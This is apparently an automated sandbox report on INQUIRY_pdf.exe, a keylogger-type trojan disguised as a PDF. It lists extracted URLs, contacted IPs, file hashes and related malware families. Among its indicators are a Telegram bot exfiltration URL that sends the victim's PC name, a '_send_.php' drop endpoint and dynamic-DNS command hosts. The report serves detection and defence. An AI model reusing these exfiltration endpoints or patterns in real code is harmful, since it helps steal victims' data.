http://www.sandoll.co.kr	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.urwpp.deDPlease	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.zhongyicts.com.cn	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	INQUIRY_pdf.exe, 00000000.00000002.1703272703.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002A31000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sakkal.com	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enlBfq	INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	INQUIRY_pdf.exe, 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002A82000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/	INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002C26000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
http://microsoft.co	INQUIRY_pdf.exe, 00000004.00000002.4167533124.0000000006230000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002A31000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003B12000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003B5F000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003B87000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002B18000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/lBfq	INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.carterandcone.coml	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	INQUIRY_pdf.exe, 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/cabarga.htmlN	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/frere-user.html	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	INQUIRY_pdf.exe, 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
http://www.jiyu-kobo.co.jp/	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002AF2000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002A82000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002B18000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers8	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:364339%0D%0ADate%20a	INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002B18000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003B62000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003DB4000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003CBC000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003AED000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003B18000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/155.94.241.187$	INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002AAC000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002AF2000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002B18000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	INQUIRY_pdf.exe, 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1557933
Start date and time:	2024-11-18 18:40:01 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	INQUIRY_pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/6@3/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 98% Number of executed functions: 89 Number of non-executed functions: 13
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target INQUIRY_pdf.exe, PID 7648 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: INQUIRY_pdf.exe

Simulations

Behavior and APIs

Time	Type	Description
12:40:53	API Interceptor	10886202x Sleep call for process: INQUIRY_pdf.exe modified
12:40:55	API Interceptor	14x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	P.O 423737.exe	Get hash	malicious	MassLogger RAT	Browse
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuY	Get hash	malicious	HTMLPhisher	Browse
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	Pedido_335_20241112_614171.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
188.114.97.3	PO 20495088.exe	Get hash	malicious	FormBook	Browse	www.ssrnoremt-rise.sbs/3jsc/
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/zWkbOqX7/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	gusetup.exe	Get hash	malicious	Unknown	Browse	www.glarysoft.com/update/glary-utilities/pro/pro50/
	Online Interview Scheduling Form.lnk	Get hash	malicious	Ducktail	Browse	gmtagency.online/api/check
	View Pdf Doc_0b40e7d2137cd39647abbd9321b34da7.htm	Get hash	malicious	Unknown	Browse	f7xiz.nhgrt.top/Kbo731/96f7xiZ96?&&V5G=YW5kZXJzLmhhcnR1bmcuY2hyaXN0ZW5zZW5Acm9ja3dvb2wuY29t
	SWIFT 103 202414111523339800 111124.pdf.vbs	Get hash	malicious	Remcos	Browse	paste.ee/d/YU1NN
	TT copy.exe	Get hash	malicious	FormBook	Browse	www.lnnn.fun/u5w9/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/iiEh1iM3/download
	Scan12112024,pdf.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	paste.ee/d/dc8Ru
132.226.247.73	Kayla Dennis CV.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	New Order_20241711.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Pedido_335_20241112_614171.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	JOSHHHHHH.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Pagamento,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Ziraat#U00a0Bankas#U0131 swift mesaji_html.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	RFQ for WIKA_pdf.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	Bank Swift Copy 2.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Order88983273293729387293828PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	P.O 423737.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	Kayla Dennis CV.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	PROFORMA + PENDENTES.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	New Order_20241711.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
checkip.dyndns.com	P.O 423737.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	Kayla Dennis CV.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	PROFORMA + PENDENTES.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	New Order_20241711.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
api.telegram.org	P.O 423737.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuY	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Pedido_335_20241112_614171.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	P.O 423737.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuY	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Pedido_335_20241112_614171.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	https://go.smarticket.co.il/ls/click?upn=u001.fgiCeFBep9-2Bp-2BI-2FBS-2FQzpCDRuDKpHPATSd7hVHBJ-2BSFdoEzv8Zw4NZGPSxyEm04-2BRZN-2FI0i4vDO6mMH-2FuoydnhnUsA7HKo9jpFeuvWWHrSZsS-2Fp6iuv8Df7jeEg4qiKp1G4MLpp4xeJ36uSp7n3xgw-3D-3DpecL_0T32ClFdYnPySZLQz4syRs0a6pDklsNoDuE6mmoJEsYczvuX7YdBHfVYJnL9oN7YZH4IR-2BKAjpUiAxVS1qn5gMuUZULkK04e-2BYPo9lpRMUYn1Fflii63SoImq2ljNdFA1OxxkzwNzY1eX51qvYcJgZ-2FoqkGN1iWP-2BFxjSYXiYLKJq9-2BBbJ3-2FzBQSSoWc2gQKdQDo2a5SBu0-2BD-2BDQdRU5BQ-3D-3D	Get hash	malicious	Unknown	Browse	104.17.25.14
	P.O 423737.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Kayla Dennis CV.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	PROFORMA + PENDENTES.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	MG-Docu6800001.exe	Get hash	malicious	GuLoader	Browse	172.67.208.107
	payload.vbs	Get hash	malicious	Unknown	Browse	172.67.165.138
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse	1.1.1.1
	NoteID [4962398] _Secure_Document_Mrettinger-46568.docx	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
UTMEMUS	Kayla Dennis CV.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	New Order_20241711.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	Pedido_335_20241112_614171.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	JOSHHHHHH.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	GD7656780000.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	01831899-1 FDMS3008SDC.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Pagamento,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	PO NO170300999.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	INQ02010391.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	P.O 423737.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	Kayla Dennis CV.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	PROFORMA + PENDENTES.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	New Order_20241711.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, SmokeLoader	Browse	149.154.167.220
	P.O 423737.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	Fluor RFQ1475#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.220
	Statement_of_account.vbs	Get hash	malicious	FormBook, GuLoader	Browse	149.154.167.220
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	NoteID [4962398] _Secure_Document_Mrettinger-46568.docx	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	DRP130636747.pdf	Get hash	malicious	Unknown	Browse	149.154.167.220
	seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	149.154.167.220
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Order88983273293729387293828PDF.exe	Get hash	malicious	Quasar	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\INQUIRY_pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1304
Entropy (8bit):	5.342479910699661
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4DRE4mKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHDRHmYHKh3oPtHo6hAHKzP
MD5:	69F4C6D6E1A57244AD636131ED81FDCF
SHA1:	3BC170B8ED30C1968102F43661A91C548A593634
SHA-256:	243AF877C88EEE73B052788B4C8FD440B044D99FA7C9BAE286887A5D1888D6EA
SHA-512:	07A5D721605890AAA7D27531E6597951C74ED2EBA51DF5BFC94C66980E88663AA19D32E662D493BF2BF5062526EB895947FF2EB8F952C81D43191AE2C698A108
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Speech, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380046556058007
Encrypted:	false
SSDEEP:	48:tWSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMuge//8PUyus:tLHxv2IfLZ2KRH6Oug8s
MD5:	811C958AD6E79045582D781EE7277A52
SHA1:	7D1785AD04FB5408505D5B5F8C820E87469D7437
SHA-256:	3A5B1B54880D228325A585C239B9AE20B74BF0FE817FE830DCCA26FB21082528
SHA-512:	A1F5E989E6DF4A77E2881F40DC8D93100FEB57E3E73E447274AC4E2215658F7C2D23C2832D19A7404FB46A25113CEE55FEFB0544403E9F8EB1368F2D11834834
Malicious:	false
Reputation:	low
Preview:	@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1m1rhqga.ske.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ilx4ls3.5y5.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vz3krbz.cl0.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rd1y0dwn.xzf.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
